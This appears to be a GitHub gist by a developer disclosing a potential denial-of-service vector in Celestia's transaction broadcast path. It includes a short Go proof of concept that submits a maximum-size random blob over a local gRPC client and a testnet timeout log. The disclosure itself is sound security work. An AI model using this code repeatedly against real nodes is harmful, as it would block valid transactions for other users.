Skip to content

Instantly share code, notes, and snippets.

@tuxcanfly

tuxcanfly/potential-dos.md

Last active January 31, 2024 20:21
Show Gist options
  • Save tuxcanfly/207ab3dc1fac4bb9c38bedad2a053f18 to your computer and use it in GitHub Desktop.
Save tuxcanfly/207ab3dc1fac4bb9c38bedad2a053f18 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
potential-dos.md

While debugging rollkit #1036 I came across a potential DOS vector.

Since celestia-node calls the blocking method BroadcastTx on celestia-core which itself blocks on transaction subscription events, a potential adversary can repeatedly trigger a maliciously blocking transactions so that the RPC endpoint has to queue other valid transaction, timing them out as well. This is a potential DOS vector.

Example of a malicious transaction - submit a max size blob - this seems to timeout on testnet with:

2024/01/26 01:56:14 code = Unknown desc = timed out waiting for tx to be included in a block

func getRandomBlob() []byte {
	randomByteSlice := make([]byte, <size>)
	_, err := rand.Read(randomByteSlice)
	if err != nil {
		panic(err)
	}

	return randomByteSlice
}

// submitDARequest submits a request to da.DAService.Submit
func submitDARequest() {
	// Create a gRPC client
	client := goDAProxy.NewClient()
	err := client.Start("127.0.0.1:26650", grpc.WithTransportCredentials(insecure.NewCredentials()))
	if err != nil {
		panic(err)
	}

	// Create the protobuf message
	blobs := []da.Blob{getRandomBlob()}

	// Make the gRPC call
	ids, _, err := client.Submit(context.Background(), blobs, -1)
	if err != nil {
		log.Fatalf("Error during gRPC call: %v", err)
	}

	// Print the response (modify as needed)
	fmt.Println(ids, err)
}

func main() {
	submitDARequest()
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment